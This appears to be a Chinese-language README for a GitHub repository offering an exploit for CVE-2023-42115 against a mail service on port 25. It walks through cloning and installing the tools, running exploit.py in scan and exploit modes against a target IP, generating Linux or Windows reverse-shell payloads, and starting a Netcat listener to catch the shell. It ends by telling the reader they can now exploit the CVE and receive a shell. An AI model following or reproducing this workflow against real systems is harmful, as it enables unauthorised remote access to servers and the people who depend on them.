本仓库包含两个 Python 脚本:
exploit.py:用于利用 CVE-2023-42115 的脚本。generate_payload.py:用于生成反向 Shell 载荷的脚本。在运行脚本之前,请确保您的系统已安装 Python 3。
git clone https://github.com/isotaka134/cve-2023-42115.git
cd cve-2023-42115
使用 pip 安装所需的 Python 库。运行以下命令来安装 requirements.txt 中列出的所有必要依赖:
pip install -r requirements.txt
exploit.py
此脚本用于利用 CVE-2023-42115 漏洞。
python exploit.py -t <target_ip> -p <target_port> [options]
选项:
-t:目标 IP 地址。
-p:目标服务的端口。
示例:
python exploit.py -t 192.168.1.10 -p 25 --mode SCAN
python exploit.py -t 192.168.1.10 -p 25 --mode EXPLOIT -f /path/to/payload.sh
generate_payload.py
此脚本根据用户输入生成反向 Shell 载荷。
python generate_payload.py
步骤:
该脚本会提示您输入以下信息:
A. 载荷类型(linux 或 windows)
B. 本地 IP 地址:用于反向连接
C. 本地端口:用于反向连接 ** I:如果您位于路由器后面或使用 NAT,请确保设置正确的端口转发到运行 Netcat 的设备。**
D. 输出文件名(例如,Linux 下为 payload.sh,Windows 下为 payload.ps1)
示例:
python generate_payload.py
Payload Generator
Enter payload type (linux/windows): Linux
Enter local IP address: 127.0.0.1
Enter local port: 4444
Enter output file name (e.g., payload.sh or payload.ps1): Payload.sh
Payload saved to Payload.sh
您需要在本地机器上设置一个监听器来接收反向 Shell。可以使用 Netcat (nc) 来实现。
nc -lvnp <YOUR_LOCAL_PORT>
nc -lvnp <YOUR_LOCAL_PORT>
按照这些步骤,您应该能够创建并使用载荷来利用 CVE-2023-42115 并接收到反向 Shell 连接。
如果您有改进建议或希望贡献代码,请提出问题或提交拉取请求。
如有疑问或需要支持,请联系